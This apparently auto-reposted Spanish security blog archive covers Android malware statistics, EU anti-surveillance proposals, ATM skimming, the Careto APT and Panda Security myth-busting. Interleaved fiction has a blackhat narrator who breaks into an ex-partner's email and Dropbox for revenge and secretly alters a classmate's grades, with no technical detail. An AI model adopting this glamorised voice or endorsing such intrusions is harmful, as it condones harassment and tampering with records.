• Las organizaciones deben llevar a cabo una política de prevención de malware, que debe abordar la sensibilización del personal de TI, la mitigación de la vulnerabilidad y la arquitectura defensiva. Tal política debe ser flexible en cuanto a la actualización y la comprensión.

Por último, el malware móvil necesita una atención especial para evitar nuevos ataques cibernéticos. Los hackers han sofisticado sus tácticas de malware móvil para que los usuarios inocentes sean víctima del cibercrimen. Le invitamos a compartir sus pensamientos al respecto.

English version:

Android is already a popular platform for Smartphone. But it also carries vulnerability along with it. A well-known Juniper report in 2013 showed that Android is the mainly infected OS that contains 92% vulnerable apps. Security experts are showing concern about emerging threats against Android and Smartphone. Due to increase in Smartphone usage, many users changed their web surfing habit by replacing desktop with Smartphone for their daily tasks. Whether they are doing online shopping, online banking or visiting social media, their first preference would be Smartphone rather than laptop or desktop.

If we talk about 2014 Smartphone security report, then Cisco 2014 security report states that mobile malware is worth considering a topic in upcoming months of 2014. However, in 2013, mobile malware share was at only 1.2%, but in future, hackers would target Smartphone devices in a great amount due to changing trend of users and easy access. Cisco said that some of mobile malwares were designed to trace Smartphone devices, but there are other malwares designed for phishing, likejacking, and other social engineering.

Android users contribute 71%, facing all types of web delivered malware, while Apple iPhone users contribute 14% facing with 14% of all web malware encounters.

Cisco report also showed that there is an android malware named “Andr/Qdplugin-A” was most encountered mobile malware (43%) in 2013.
Another important Sophos 2014 security report listed out some most happening android malware during 2013, which are as follows.
 

From the above listed android malwares, there are still three major android malwares that spread havoc in 2013, which are as follows. 

Botnet named “Andr/GGSmart-A”: This Botnet works on PC and mobile in the same pattern like using centralized command and control of a mobile device. It can send a chargeable premium SMS to the device owner. This Botnet can change the text of SMS, control premium SMS numbers.

Ransomware: In June 2013, the first ransomware was discovered against Android device named Android Defender. This ransomware uses different social engineering tactics and makes files and device inaccessible and demands payment to release your device or files. Generally, ransomware gets access administrator privileges. It can restrict outgoing calls, change settings, kill tasks, and uninstall the apps. Even ransomware can remove back and home button of the browser.

Andr/Spy-ABN: It is a new form of malware, which targets banking website by making a combination of man-in-browser attack and social engineering tactics to steal user data from Smartphone.

Some security precautions from the user and organization’s perspective:

•    Never respond to unknown ads link as it may contain malware that may install malicious software or may lead you to the websites.
•    Always refuse apps that require access permission like contacts and other personal stuffs during the installation.
•    Always prefer Google Play for App download and avoid a third party download sources as it may contain malicious apps.
•    Always consider user’s reviews before downloading any apps.
•    Use trusted antivirus program in your Smartphone that regularly scans your entire Smartphone.
•    Keeps your device updated. Always consider an update from device manufacturers.
•    Access your device only in a secured wireless access, avoid free wifi.
•    Organizations should choose malware incident prevention according to environment like managed and non-managed environment.
•    Organizations’ IT staff should provide knowledge to its users and employees to bring awareness among them about vulnerability and risk mitigation.
•    Organizations should carry out malware prevention policy, which must address IT staff awareness, vulnerability mitigation, ndefensive architecture. Such policy should be flexible in terms of update and understanding.

Finally, mobile malware needs individual attention to avert further cyber attacks. Hackers have become sophisticated and use mobile malware tactics to make the innocent users victim of cyber crime. You are welcome to share your thoughts on same niche.

About Author: Abel Wike is a head of fraud prevention team at ClickSSL.com She enjoys the challenges of creativity and attention to detail. Advance Technology has always a source of wonder for her, sparking her research, to extend her sympathetic and knowledge of this earliest progress. In so doing she has focused with a deeper insight into various technologies. Follow her on Facebook, Twitter & LinkedIn

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

martes, 18 de febrero de 2014

Merkel propone una red europea contra el espionaje de los EE.UU. y Gran Bretaña

La canciller alemana, Angela Merkel, propone la creación de una red de comunicaciones europea para ayudar a mejorar la protección de datos.
El principal objetivo sería evitar que los correos electrónicos y otros datos atravesaran las redes de comunicaciones de los Estados Unidos.

Varios documentos clasificados de la NSA revelaron que se están recogiendo grandes cantidades de datos de carácter personal a través de Internet en pro de una vigilancia desmedida llevada a cabo por los EE.UU. y Gran Bretaña. Snowden filtró que incluso los teléfonos móviles de los aliados de Estados Unidos, como Merkel, habían sido controlados por la Inteligencia Estadounidense. 

Y todo esto no ha hecho más que acrecentar ha impulsado gran preocupación en Europa.

Merkel dijo que Europa tenía que hacer más en el ámbito de la protección de datos y criticó también el hecho de que Facebook y Google utilizan las leyes de países con bajos niveles de protección de datos mientras que realizan negocios en países que ofrecen garantías más rigurosas.

"Sobre todo, vamos a hablar acerca de proveedores europeos que ofrecen seguridad para nuestros ciudadanos, por lo que uno no debería tener que enviar mensajes de correo electrónico u otra información a través del Atlántico", dijo.

"De hecho, se podría construir una red de comunicación dentro de Europa".

La vigilancia exhaustiva ya se realizó bajo los nazis y en la Alemania Oriental comunista, así que la privacidad personal es un tema muy sensible en  Alemania.

Un portavoz de la política exterior de los demócratas cristianos de Merkel, Philipp Missfelder, dijo recientemente que las revelaciones sobre el espionaje EE.UU. habían empujado a llevar las relaciones con Washington a su peor nivel desde la invasión liderada por Estados Unidos a Irak en 2003.

Un funcionario francés, citado por la agencia de noticias Reuters, ya ha adelantado que el gobierno de París planea tomar la iniciativa alemana.

Fuente: Data protection: Angela Merkel proposes Europe network


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Echando un vistazo a un cajero automático manipulado

Las modificaciones en cajeros de sucursales bancarias para clonar tarjetas no son nada nuevo. Normalmente se manipula la zona de entrada de la tarjeta con un dispositivo adosado al mismo que permite la lectura de la banda magnética, lo que se denomina ATM skimming. Después, se intenta obtener el número PIN superponiendo un teclado falso o colocando una microcámara disimulada. Un fraude que mueve millones de euros al año en todo el mundo.

En el siguiente vídeo desarman un cajero automático manipulado y muestran precisamente un lector falso de tarjetas y una microcámara encastada en la parte superior de la pantalla. Poco o nada podrá hacer un usuario para evitar que clonen su tarjeta...
  

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Umbrarum hic locus est: Los textos no perdidos del hacker II & Desmontando leyendas urbanas.

Estimados lectores de Hackplayers.com, les presento una segunda parte de la recopilación del “Libro de las sombras” que comencé con mi post anterior. A manera de recordatorio, son historias curiosas propiamente y monólogos que me encargué de recopilar en todos los lados que escuchaba a alguien decirlas o conversarlas. No tienen un orden cronológico pero no importa. Pueden referirse a una sola persona o varias. Ustedes decídanlo. La temática de las mismas, ya la saben señores hackplayers, no creo que no les haga click. Les dejo a su imaginación la interpretación de cada una. Y espero sobretodo les gusten.    
  * Y cómo texto alternativo les dejo ahora un artículo de Panda Security sobre los mitos y leyendas urbanas que rodean a este, nuestro entorno de la seguridad informática. ¿Ustedes qué opinan? (La liga del texto íntegro al final de este post).
   Salacadula chalchicomula bibidi babidi bu...
  1.- No trabajan mujeres en compañías de seguridad. Esta presunción también es frecuente, y falsa. La realidad en Panda Security es muy distinta: más del 30% son mujeres, muchas de ellas ocupan puestos en áreas técnicas y en dirección. Y tiende a crecer, ya que cada vez más son las féminas que se preparan adecuadamente para sectores como el de la seguridad informática.   
  Área Metropolitana, México D.F, Marzo 2013.  
   Otra vez enfrente de un monitor a media madrugada; es la luz que atraviesa mis pupilas, como la heroína a través de las venas de un adicto. Soy puramente dependiente de mi putrefacto vicio, de mis zombies, de mi prodigiosa botnet hecha con la morbosidad y la suciedad de la gente: un troyano que te infecta lo mismo si entras a ver porno, que si entras a visitar inocentemente lolshock dot com. ¿Cuántos individuos creen que entraron?... 

Esa sensación de poder tener el control, de deshacer el mundo a voluntad. Uno sabe que tiene madera de vil cuando descubre en cada barrera un desafío propio.

Pero… la verdad es que sólo me quedo ahí con mi botnet echando la chocha; le indago su estado de ánimo, todas las noches le pregunto qué ha sido de su vida y como cada vez tiene adheridos más y más zombies. La miro como en un estado de amor contemplativo; no la uso, no la rento, no la vendo, no la toco si quiera. Me dedico a atrapar alacranes para verlos a través del frasco.  No utilizo su veneno.  No me creen verdad? Ja! Yo tampoco me creería. Soy una fuerza proterva y eso me entusiasma.
  Una migraña horrible anuncia que no tengo sueño, otro vaso de chocolate y empezamos a ver código, comandos, una que otra mafufada ingenieril. Brilla la ventana de mi Skype, alguien de mi trabajo en el otro lado del orbe pidiendo ayuda con una configuración. Lo he visto miles de veces y le resuelvo la duda en 35 segundos. Me da las gracias y hacemos plática ligera. Insiste en que desea ser como yo cuando sea mayor. Una leve sonrisa malévola se dibuja en mis labios; él no sabe que yo soy menor en edad, no sabe mi apariencia física, no sabe cómo soy, sólo sabe mi nombre, mi número de contacto, mi dirección de correo y el sonido de mi voz…Esto es un halago perturbador. Tiene un aura romántica esto de presentarse ante el mundo como ellos creen que eres,  cuando en verdad eres mucho más como ellos creen que no lo eres…

La noche nos vuelve bichos estrambóticos.
    

2.  Las compañías antivirus son las que hacen los virus. Este mito ha acompañado a Panda Security durante los 20 años de historia de la compañía, y seguro que a más empresas del sector. Esta afirmación es absurda, sobre todo si tenemos en cuenta que recibimos cada día más de 55.000 virus nuevos y diferentes. Y si fuera verdad, ya habría saltado el escándalo en los más de 20 años que el sector lleva protegiendo a los usuarios. Uno de los problemas que la industria ha tenido que resolver a lo largo del tiempo es cómo poder asumir la carga de trabajo de procesar la cantidad creciente de amenazas informáticas para mantener protegidos a nuestros usuarios.Sur de la Ciudad de México, México D.F, Agosto 2011.
   Otra vez esta imagen. Imagínenla con un / en medio del < y el 3
“Un corazón roto: Así es como nacemos los supervillanos”. La gran y totalmente cierta frase que un buen amigo mío de la carrera, el Ingeniero A. Barbosa Cabrera soltó hace tiempo, en una situación sentimentalmente desventajosa, y nada buena y que hoy, hoy se escribe conmigo. 

La mujer, muchachos, innegablemente de eso se trata el mundo. Sólo que cuando esa mujer ya no está contigo (y tú querías que estuviera) el golpe que blande es contundente. Un pinche mazazo hagan de cuenta.  Y ni modo carajo, te dan ganas hasta de vomitar (¿¿y cómo no vas a vomitar si uno trae las naúseas en el alma??).
Pero anyway… invariablemente, gracias a mi atracción hacia lo inusual e inesperado, ocurrió algo bastante curioso (como yo lo pensé después): un desamor atrajo a otro desamor. Camino de regreso a casa, ya roto yo, me habló “ella” tirando la lágrima,; una linda chica trigueña que conoce (y a la que confío) de mis verdaderas artes oscuras con el bit, para invocarme (nuevamente) en su tabla ouija: 
“Si te confío esto que me pasa es para que te vayas dando cuenta de lo desesperada que es mi posición. No es que no me gustes, sino que no quiero que pienses mal de mi. Yo no soy una ogt, no me interesa perversear con nadie. Lo que pasa es que él y yo estamos pasando una etapa difícil, ya ni hay tiempo o ganas de vernos y menos cuando el cabrón dice que está acojonado de trabajo, yo se que hay algo más, una vieja o varias por ahí y me duele, no sabes amigo. Cuántas veces va una de pendeja a creer, así nada mas por desinformación, por falta de agudeza, de observación, que encontramos a una persona que vale. Porque claro queremos que nos entiendan. Y tanto lo quiero que paso por alto cosas muy importantes. Me gusta el wey, me mira bonito, me dice cosas lindas y tómala, caigo cual estúpida. ¿Por qué?!! Le ayudo a que me mienta, ya le entregué todito mi corazón, cuando el pendejo no ha hecho ni el menor esfuerzo. No se vale mi niño, y todo porque me faltaron los ovarios suficientes para amachinarme, claro que una quiere el gran romance tipo telenovela, la pareja ideal, todo ideal. Nada de eso nos llega si no tenemos la cabeza fría y nos dejamos llevar. Así que por favor ayúdame, yo te lo pago como quieras, pero dame… dame todo lo que tengas y puedas de ese wey… ya sabes qué es…”
Y pues por supuesto dado mi potencial, todo mundo sabemos qué es. De mi fatal tendencia hacia el lado del blackhat; no puedo controlarme, es más fuerte que yo. 
Muy bien… RICARDO… qué tenemos aquí… Skype, Gmail, DropBox, y su infaltable cuenta en FB….veamos…es ese? pinche cara de hiena con rabia cómo es que anda con mi guapa amiga!!…ash ya ni enojarse es bueno.
No sé por qué hay un tipo de mujer que prefiere a los hombres que no saben tratarla. Pobre de mi amiga, tan hermosa, tan agradable, tan…todo, pero…me dolió mucho más decirle lo que su RICARDO hacía y era, y me dolió aún más mostrárselo a viva luz.
“Quiero dejarle un mensaje a ese desgraciado que me destrozó el corazón, quiero que sepa que soy yo la que estuve en su correo y que se le paren los pelos de punta al saber que puedo ver muchas más cosas de las que imagina”.  

El verdadero triunfo de nuestros adversarios es lograr quedarse instalados en nuestra mente, en forma de que nos aterrorice.
Entonces preparamos un sencillo *.txt que bastó con subirlo a su cuenta de DropBox, ahora en nuestro poder. Solamente esperamos a que abriera su aplicación y pum! Ricardo veía un pequeño documento con su nombre como título reflejado en su pantalla.
“Hola hijo de puta, ya sé ahora que lo que más te gusta, es sentarte en el Bar Barón Rojo de Polanco o en el Café Mozart de Insurgentes y reírte con tu jauría de machos de las muchachas que tú conquistas, que engañas, esas que andan enamoradas, esas que andan con las ganas de la vida, que hasta haces que les brillen los ojos….”
“Te crees omnipotente, que nada te hace daño, que nadie te importa, anda sé valiente ahora, pues no vas a saber de mi, podrás imaginártelo,  pero de tu vida…de tu  vil y asquerosa vida me encargo yo que todo el mundo sepa…”
“No te preocupes corazón, mi enojo sólo va a durar lo suficiente, y como dicen: del cielo a la tierra no hay nada oculto, tu me robaste más que mi amor, pero yo te estoy quitando todo lo demás… Curiosamente has de saber que en tu DropBox tienes un archivito muy interesante “plantillaTrimestreFinal.xls” quiero decirte que husmee un poquitín (te stalkee mi amor) se nota que tiene muchas cosas importantes, medio trascendentales por así decirlo. Ojala que tengas un respaldo de todo gordo, yo creo que si =). Ah… te deseo lo mejor del mundo baby”…
Por ahí pregonan que en la vida debes tener como amigo a un médico, a un abogado y a un asesino. Podríamos añadir quizá a un blackhat.
La mujer, muchachos, innegablemente de eso se trata el mundo.
 
3. Las compañías de seguridad contratan a hackers. Lógicamente, no podemos hablar en nombre de toda la industria, pero en Panda Security este tema siempre nos ha preocupado mucho y nunca hemos contratado a sabiendas hackers que hayan estado “en el lado oscuro”. Sí contratamos (y siempre estamos buscando) a hackers “blancos”. Una variación de este mito es que hay que ser ingeniero informático para dedicarse a la seguridad, que es falso. Los perfiles de los profesionales que trabajan en Panda son muy variados: ingenieros, matemáticos, físicos, formación profesional, autodidactas, etc. Lo que tienen todos en común es que sienten un especial interés, auténtica pasión en muchos casos, por la seguridad informática.

Clase de Ecuaciones Diferenciales, México DF, Octubre de 2008
  Los verdaderos perdedores se autoconsideran listos, les cabrea que los menos dotados (según ellos) lleguen más lejos en cualquier cosa. Creen que el talento vale más que la persistencia y el trabajo. Yo creo que van de la mano. La clase de ecuaciones diferenciales es una de mis favoritas en mi carrera. Está para pasar aceite diario, realmente el maestro es alguien que te reta a pensar, que te tunde con problemas difíciles y que nos ha reprobado a la mayoría con un grandioso 30 de 100 debido a sus set de problemas marca garrote vil: “Para pequeñas oscilaciones, la dinámica de un péndulo doble queda representada por un sistema de ecuaciones de la forma:
(m1 + m2)`21?001 + m2`1`2?002 + (m1 + m2)`1g?1 = 0 m2`22?002 + m2`1`2?001 + m2`2g?2 = 0.
Escriba el sistema de ecuaciones lineales satisfecho por las transformadas de Laplace de ?1 y ?2 en general…” Damn it…otra vez sufriremos…Ingenieros en Computación, Ingenieros en Mecatrónica, de Mecánica, Industriales y un Licenciado en Informática somos las felices víctimas de nuestro profesor. Hay un tipo en la clase que se cree el guapo, el que sabe todo, un Mecatrónico X, incluso cuando le preguntan contesta despectivamente (aunque conteste erróneamente) y además tiene una actitud altamente ofensiva y displicente hacia el Licenciado, sólo por el hecho de ostentar el título de Licenciado y no de Ingeniero. Pero les digo que es un totally asshole, al falso franciscano lo acusan sus eructos. Me habría valido entera madre su forma de ser y actuar hasta que un día este imbécil se voló la barda…y como yo soy de mecha corta, bueno…Un día antes de empezar la clase, el individuo en cuestión estaba jadeando con su tribu y de repente se atrevió a ladrar casi enfrente de mi “…jaja yo no sé porque nos siguen juntando a nosotros los “MECAS” con los pinches ingenieros palurdos de computación, esos weyes qué? Que se vayan a poner su café Internet los pendejos jajaja o a instalar Windows…en sí todos apestan, sus pinches carreras fáciles y sin chiste …no o sea espérate wey… checas al “Licenciado” en Informática?? De entrada LI-CEN-CIA-DO Prrtt!! Los Licenciados no saben ni madre de nada de Ingenieros o seaaa en si no saben nada!!! saquen a ese wey y llévenlo a la clase de Tijeritas 2 que está perdido aquí jajaja….”Lo primero que pensé fue rostizarlo a golpes, sin embargo eso habría sido altamente contraproducente para mi record académico y por qué no?? También iba a ser totalmente expulsado, sin más. Así que recurrí a otros métodos igual de sucios que ese fantoche.“Tengo que desquitar mi rabia con él” y la verdad en ese momento no pensaba claramente, se me espumaba la cara, de sólo volver a recordar sus odiosas palabras sin sentido y sus muecas. El que se cree muy listo, muy cabrón y muy cojonudo comete cuando menos dos errores: uno es pensar que todos somos pendejos y el otro seguirle dando cuerda a la vanidad. Y hay un tercero: Pensar que no van a existir represalias.Mi cerebro juega conmigo, no pienso fríamente, me dejo controlar por mis emociones y mi sentimiento de venganza…entro a la base de datos de su profesor de Dinámica (clase que yo no llevo) y…cambiamos algunas notas en negro a rojo, tareas incompletas y trabajos con calificación reprobatoria. Para rematar mi malévola acción, 15 minutos después de los cambios, inesperadamente y para mi fortuna noto que el profesor titular había entrado a hacer un recálculo de toda su planilla en todos sus grupos. 

Perfecto, ya no hay evidencia de ningún malhechor. El sistema guarda por defecto los últimos 5 cambios realizados en la base de datos y tiene 6 grupos. 
No hay manera de que se den cuenta que alguien penetró en el sistema, no hay forma de saber que un alumno fue modificado habiendo 20 por cada grupo y existiendo 6 grupos, no hay forma de saber que fue una maniobra vengativa de un alumno ajeno a la carrera, pues ni me conoce, ni me habla. 

Quizá le recuperen varias notas cuando vaya a reclamar con su profesor calificaciones que él seguramente sabe que tenía, pero no todas. Siento un escozor por haber hecho un crimen perfecto…pero de repente algo en mi me hace reaccionar ¡¿qué carajos estoy haciendo?! 

Mi moral sale como una última defensa hiriéndome y reclamando: deja todo como estaba. 

No puedo, me da miedo, ahora sí pienso que pueden estar vigilando, que cualquier cambio se notaría y me atraparían. No puedo, ya lo hice,  ya es irreversible. Siento que tengo la dignidad de una prostituta con 20 hijos hambreados…lo peor es que también siento emoción…

Uno piensa que le teme a la sangre, supone que es del todo incompatible con cualquier fechoría, y de repente cualquier día de éstos se descubre a merced del atolondramiento exquisito de la criminalidad, donde la sangre ya ni se ve, ya ni sabe y ya ni la notamos. Y ni se huele.
  4. No existen virus para Mac, Linux o plataformas móviles. ¡Ya nos gustaría a todos! La percepción que se tiene es que no hay riesgo ni peligro para estos usuarios, ya que los virus se hacen sólo para plataformas Windows. La realidad es que sí hay virus para todas estas plataformas. La diferencia estriba en la cantidad de amenazas informáticas que circulan si lo comparamos con Windows. Explicarlo es fácil: un hacker busca el beneficio económico. Si lo que quiere es llegar al máximo número de gente posible para conseguir más potenciales víctimas a las que robarles posteriormente, ¿cuál sería el blanco ideal? ¿Una plataforma con 10 millones de usuarios, u otra con 500 millones? La respuesta es obvia.
  Pre-primaria Z, Área metropolitana, México D.F, Mayo 1994  
  Todo el día nos mienten los miserables adultos. Nos meten dentro de una burbuja de mentiras, creen que no entendemos nuestro entorno, piensan que nuestra vida no es difícil, y todavía se atreven a exigirnos que les digamos la verdad, y nos regañan de cualquier cosa. Y lo peor es que no nos comprenden. Los grandes se toman todo en serio,  y pueden hacer lo que se les pega la gana. Conmigo siempre es al revés, todo lo que me pongo a hacer o todo lo que les digo piensan que es para jugar. Y bueno si a veces, pero es que en serio ¿me creen tonto? Quizá ellos lo sean más porque no saben discernir entre una broma y algo de verdad. Como la otra vez le preguntaba a mi mami por qué la Miss me seguía enseñando en la escuela a contar hasta 1000 y a sumar y restar si eso, yo ya lo sabía hacer, “por qué mejor ya no voy a la escuela mamá??” 

Pero ella se enoja y dice que no sea un malcriado. Lo mismo me dijo cuando corté el cable de la video que se había quemado y lo arreglé para que volviera a funcionar “Ya deja de agarrar todo!! Qué no ves que te puedes electrocutar, vete a jugar a otro lado, estate quieto!!!” 
Y entonces me fui a jugar con un pequeño videojuego que me compró una vez en la plaza: una pelotita que rebotaba y eliminaba bloques y únicamente no tenías que dejarla irse al precipicio. “Pff qué lento y aburrido es esto, a lo mejor puedo hacerlo más rápido”. Cuando diseccioné mi juguetito vi que si le quitaba una resistencia podía pasar más voltaje de la pila al juego y entonces todo iba mucho más acelerado. Era más divertido =). 

Se lo fui a enseñar corriendo a mi mami pero inexplicablemente ella volvió a regañarme, “Ya destruiste otro aparato??!! Por qué todo lo que te compro o lo que hurgas te da por abrirlo??! A ver si ya vas a aprendiendo a valorar las cosas!!??”. No mami no lo destruí, está mejorado, y adaptado a mis necesidades. 

Es un asco ir a la escuela. La única hora menos miserable es el recreo, camino yo solito con mi sándwich y mi lechita o a veces cuando me da un billete mamá, camino con 3 bolsas de palomitas. 

Al principio trataba de hablar con los demás, pero son demasiado estúpidos, ¿Quién quiere ser amigo de alguien que todavía se mea en los pantalones y que juega juegos tontos y que ni siquiera puede entender el abecedario?

Según la Miss dice que con mi mal genio, mi carácter y como soy demasiado inquieto yo voy a ser de grande un gran pintor, o un bailarín. Yo le digo que cómo cree, que no, porque esos se mueren de hambre. Aunque es cierto, que tengo muy mal genio y que me enojo casi diario. Pero es que las maestras me fastidian y hacen que mi mami me reprenda y me castigue. “Se para de la clase. Molesta a la maestra. Hace cosas que la Miss no pide que hagan. Se distrae. Tiene mal carácter”. Pues claro que me paro de la clase si ya me sé todo “no Miss no escribí mi tarea de sumas, la tengo hecha en la cabeza, mire le puedo dar las respuestas aquí mismo”. 

¿Preguntarle a la Miss cómo se suman los números complejos es molestarla? Yo quería que me explicara cómo se hacía pero estoy pensando que nada más sabe sumar los numeritos que todos apenas y con trabajos resuelven. “Miss ¿por qué seguimos viendo sumas y restas, si sumar 3+4 es lo mismo que sumar 23445666.4 + 2346633.5??? Si quiere seguir con las sumas, el otro día vi algo más interesante en un libro de mi tío, Miss, decía que 1 + 1 es = 1 y 1 + 0 es = 0…” “Pon atención a la clase y has tu tarea o te voy a poner otro 5 en tu boleta…”

“No”. “Yo voy a leer otras cosas, voy a aprender a solas, quiero ver, quiero conocer”. “Quiero saber qué pasa con el mundo, ¿¿por qué si puedo entender tanto, ellos no quieren enseñarme más??. Probablemente no sepan. Bueno entonces yo sí sabré…”Seguramente el psicólogo que empecé a visitar con mi mami puede decirme y armar todo un reporte elaborado de mi comportamiento a los 6 años, pero siempre que leo (a escondidas) lo que escribe en sus notas, yo insisto en explicarle a mamá tal y cómo me suceden las cosas en realidad: siento como una horda de bichitos rebotando en mi cabeza que se posesionan de mi, me mandan flashazos muy rápidos, y me dicen cómo y cuándo hacerlo todo. Y a la máxima precisión. Por eso, hace mucho aprendí a jugar solito.
  5. Hace falta saber mucho para ser hacker, desarrollar virus, entrar en los sistemas… En algunos casos, sí; en otros, no. Hace algunos años era bastante costoso desarrollar virus, gusanos, troyanos, etc., y sí hacía falta tener conocimientos técnicos. De hecho, muchos de los hackers comenzaban “jugando” mientras aprendían, y llegaban a tener realmente mucho dominio de diferentes lenguajes de programación, protocolos de comunicación, etc. Hoy en día no es necesario, y un caso reciente lo hemos visto con Operación Mariposa, donde los autores tenían conocimientos muy limitados. Y esto sucede porque se venden a través de Internet kits que permiten a “aprendices” generar malware y configurarlo sin necesitar prácticamente experiencia. No nos atreveríamos a afirmar que cualquiera puede hacerlo, pero con un poco de dedicación e idea, sí, se puede construir –por ejemplo- una red de bots capaz de infectar a 13 millones de ordenadores en todo el mundo.Búnker Banco Z, México D.F. Diciembre 2010
  Un par de “Pentestings” rápidos sobre esta podrida red, ayudan más a conciliar el sueño que todo el rivotril del mundo. 
  Me ofrecí a hacer este pequeño servicio para una paga extra, que me ayudará a comprarme un lindo auto. Es medio aburrido, repetitivo, y no me canso de decir que jamás abriría una cuenta bancaria aquí porque su, llamémosle “Seguridad” es un verdadero bodrio.
Llevo 2 horas aquí, desde las 11pm. Me dejaron con el guardia que está como a 50 metros de mi, no hay cámaras, no hay nadie que te cuide. Bien podría robarme algo y nadie se daría cuenta.
En unos momentos más llegaría la ingeniera encargada de la seguridad perimetral de la parte de la red donde estoy haciendo el pentesting. Estoy más concentrado en inventarme una buena cadena de insultos elegantes contra ella y su red, que en terminar lo más pronto posible mi trabajo.
“Hola soy Marisol, tú debes ser el que está haciendo el pentest, eres el único que está aquí no??, yo me encargo de mantener a flote esto y que no haya problemas, te importa decirme cómo va todo y si has tenido algún “issue”?
“Hola Marisol, pues si…yo estoy haciendo este trabajo. Oye, la red está horrible eh?, no puedo creer que se sostenga en sus propias patas, apenas y le hice un scanneo simple a tus switches y volaron el CPU al 100%, tu firewall tiene reglas que puedes impersonar con un servicio fake y mira muchas cosas tienen pass de default. ¿Creen de veras que con su correlacionador pueden mitigar todo? Yo sé que es de los mejores pero solamente les cubre como la media mitad de un problema, y eso es como un tumorsito, aunque esté chiquito va a seguir creciendo… ¡¿Y qué diablos administras aquí si cualquier cosa que le tocas a la topología se va a la mierda el sistema?!”
“Mira mi pentester… a todas luces me estás ofendiendo, no nos hagamos idiotas. Pero todos esos cuestionamientos no son problema mío. No me inquietan ni me roban la calma, al contrario más bien. Y no me voy a desgastar en decirte pendejada tras pendejada de esto y lo otro, cuando yo se muy bien cómo se resuelve todo. No creas que no he hablado con mi jefe de todo este monstruo que tenemos pero al final de cuentas la que da la cara contigo, soy yo y ni culpa tengo. Así que no mames, no me taches de estúpida, y si quieres competir con alguien en ver quién hace un mejor trabajo de penetración, podrías intentarlo conmigo….jajaja  ven te ayudo con tu gran servicio que nos haces…”  
Es la debilidad de nosotros los maníacos. No había visto muy bien a Marisol de todas formas, pero después de esa tácita contestación, la observé detenidamente de arriba abajo, de izquierda a derecha, y….pff hot girl hot beauty!
“Oye Marisol, y de qué nos va servir (o a ti) hacer esto si, para nada le estamos pegando a lo principal, donde se encuentra su correlacionador, ese que todo lo ve,  para ser exactos. Yo sugiero que se haga un pentest ahí, puedes comentarlo con tu jefe…quizá él…”
“Mi pentester…¿tienes cerebro, pito y huevos? Usa el primero para “atacar sabiamente” donde tú quieres, y qué todos aquí se den cuenta, que tenemos pura basura, úsalo también para dar una explicación contundente mañana que te pregunten por qué hiciste una intrusión en áreas que no te correspondían, porque se va a armar, (y de veras) la campal con mi jefe, yo se lo que te digo…Usa el tercero para ser un machito y hacer lo que te dicten tus bolas y el segundo…puedes usarlo cuando acabes todo esto, para orientarte…”
Y pues cómo no así, así con esas respuestas, lo hice todo. Hubo un final feliz y otro no tanto. El no tanto, fue que salí vetado del banco por haber hecho una prueba donde no debía hacerla, y abrieron un historial contra mí. Puedes no estar de acuerdo con las reglas, pero a veces si sale caro pasártelas por el arco del triunfo…bla bla bla me vale, pinche banco huele a caca. 
No saben el encanto que es hablar de computación cuántica con una mujer desnuda. Toda pasión nace de una decisión o elección a la fuerza. Podría decir que me utilizó, que me hizo romper las normas, pero me atrajo muchísimo (de todos lados) y así lo decidí; y es igual. El chiste no fue tumbarle los calzones y el brassier, eso sucedió por la pura fuerza de gravedad. Lo que realmente me hizo muy feliz fue que ella, me tumbó la aureola. (Aunque yo por mi cuenta ya me la había tumbado muchas veces).

Fuentes utilizadas:  


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

miércoles, 12 de febrero de 2014

#TheMask: la nueva y más compleja ciberamenaza es hispana (o vaya Careto que se les quedó a los de Kaspersky)

El equipo de investigación de seguridad de Kaspersky ha revelado "una de las más avanzadas" amenazas de malware creadas hasta la fecha llamada Careto o "La máscara", nombre visto en uno de sus módulos junto con otros que parecen demostrar que ha sido programado por hispano-hablantes: además de "careto", en el código también se ha encontrado una clave de cifrado RC4 denominada "Caguen1aMar", una referencia al directorio "c:\Dev\CaretoPruebas3.0" y la cadena "Accept-Language: es".

Lo que hace especial al malware es que es extremadamente sofisticado, dicen que incluso más que Duqu, Flame o Gauss. Entre sus módulos podemos encontrar un backdoor muy avanzado, un rootkit, un bootkit, versiones de 32 y 64 bits de Windows, Mac OS X y Linux y posiblemente versiones para iPad/iPhone (Apple iOS) y Android.

Cuando está activo en un sistema, Careto puede interceptar el tráfico de red, las pulsaciones de teclado, las conversaciones de Skype, claves PGP, analizar el tráfico WiFi, obtener información de dispositivos Nokia, capturas de pantalla y supervisar todas las operaciones de archivo.

El malware recolecta una larga lista de documentos desde el sistema infectado, incluyendo claves de cifrado, configuraciones VPN, claves SSH y archivos RDP. Además de varias extensiones que son monitorizadas que podrían ser específicas de herramientas de cifrado militares o gubernamentales.

La campaña estuvo activa desde 2007 hasta enero de 2014, y actualmente los servidores C&C han sido cerrados. El principal método de propagación fue phishing mediante correos electrónicos falsos desde periódicos como "The Guardian", "The Washington Post", "El País", "El Mundo" o "Público" y los objetivos principales fueron instituciones gubernamentales, representaciones diplomáticas y embajadas, compañías de petróleo y gas, energía, instituciones de investigación, firmas de capital privado y activistas de alto perfil.

Las víctimas de este ataque dirigido se han encontrado en 31 países de todo el mundo que abarcan el Medio Oriente, el Reino Unido, Europa (incluyendo Alemania y Bélgica), así como en África y en los Estados Unidos.

Sospechan que proviene de una agencia o gobierno de habla hispana. ¿España? Podría ser... 

"Me cago en.... (fill in the blank with just about anything) is a very common swear expression in Spain, but not in other Spanish-speaking countries."

Fuentes:
- Unveiling “Careto” - The Masked APT
- Researchers uncover cyber spying campaign dubbed "The Mask" 
- Sophisticated Spy Tool ‘The Mask’ Rages Undetected for 7 Years
- New ‘Mask’ APT Campaign Called Most Sophisticated Yet
- The Careto/Mask APT: Frequently Asked Questions
- The Mask/Careto: APT de ciberespionaje que involucra diarios argentinos y españoles
- Descubierto el primer programa avanzado de espionaje informático de un gobierno hispanohablante
- Careto, el malware más sofisticado hasta la fecha... ¿de origen español?
- Infographic: The Mask malware victims
- Espionage malware may be state-sponsored, researchers say
- Meet "The Mask": Possibly world's most advanced computer spy outfit


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

El día que contrataacamos contra el espionaje masivo

